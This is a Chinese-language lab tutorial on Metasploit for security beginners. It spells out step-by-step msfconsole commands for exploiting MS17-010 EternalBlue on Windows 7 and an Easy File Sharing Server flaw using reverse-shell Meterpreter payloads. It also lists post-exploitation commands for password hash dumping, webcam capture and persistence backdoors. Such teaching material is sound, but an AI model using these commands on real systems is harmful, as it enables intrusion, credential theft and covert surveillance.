本文通过两个真实漏洞实验,系统讲解 Metasploit 的使用流程、核心模块原理以及完整攻击链,适合网安初学者与竞赛备赛人员。
一、Metasploit 框架简介
Metasploit 是目前世界上最强大的渗透测试框架之一,集漏洞利用、权限获取、后渗透控制于一体,被广泛用于:
二、Metasploit 基础知识
1. Metasploit 启动方式
| 方式 | 说明 |
|---|
| 菜单启动 | Kali → Exploitation Tools → Metasploit | | 桌面快捷方式 | 点击 msfconsole | | 命令行启动 | msfconsole(推荐) |
2. Metasploit 核心模块
| 模块 | 作用 |
|---|
| exploit | 漏洞利用模块 | | payload | 攻击载荷(反弹 shell、meterpreter等) | | auxiliary | 扫描、嗅探、爆破 | | post | 后渗透模块 |
3. 常用命令
| 命令 | 作用 |
|---|
| show | 显示模块/参数 | | search | 搜索漏洞 | | use | 使用模块 | | set | 设置参数 | | run / exploit | 启动攻击 |
三、实验一:永恒之蓝攻击 Windows 7(MS17-010)
实验环境
| 设备 | IP |
|---|
| Kali Linux | 192.168.10.10 | | Windows7(靶机) | 192.168.10.20 |
1. 检测是否存在 MS17-010 漏洞- msfconsole
- use auxiliary/scanner/smb/smb_ms17_010
- set RHOSTS 192.168.10.20
- run
复制代码出现 VULNERABLE 即表示存在漏洞。
2. 查找漏洞利用模块选择: - use exploit/windows/smb/ms17_010_eternalblue
复制代码
3. 设置参数- set RHOSTS 192.168.10.20
- set PAYLOAD windows/x64/meterpreter/reverse_tcp
- set LHOST 192.168.10.10
复制代码
4. 发起攻击成功后会看到: - Meterpreter session 1 opened
复制代码
5. 控制靶机- sysinfo
- ipconfig
- screenshot
- shell
复制代码🎉 成功获取靶机控制权!
四、实验二:攻击 Easy File Sharing 软件
实验环境
| 设备 | IP |
|---|
| Kali | 192.168.10.10 | | Windows7(32位) | 192.168.10.30 |
1. 搜索漏洞模块选择: - use exploit/windows/http/easyfilesharing_seh
复制代码
2. 设置参数- set RHOSTS 192.168.10.30
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.10.10
复制代码
3. 启动靶机软件(在 Win7 上打开 Easy File Sharing Server)
4. 发起攻击成功后会建立会话:
五、Meterpreter 常用命令
| 命令 | 功能 |
|---|
| sysinfo | 查看系统 | | screenshot | 截图 | | webcam_snap | 摄像头 | | upload / download | 文件传输 | | hashdump | 提取密码 | | persistence | 设置后门 |
六、实验总结
| 技术点 | 掌握情况 |
|---|
| Metasploit 框架使用 | ✅ | | 漏洞扫描 | ✅ | | EternalBlue 利用 | ✅ | | 软件漏洞攻击 | ✅ | | Meterpreter 控制 | ✅ |
七、适用人群
- 网络安全初学者
- HCIA / HCIP 实验
- 职业院校竞赛
- 护网实训
- CTF 实战
|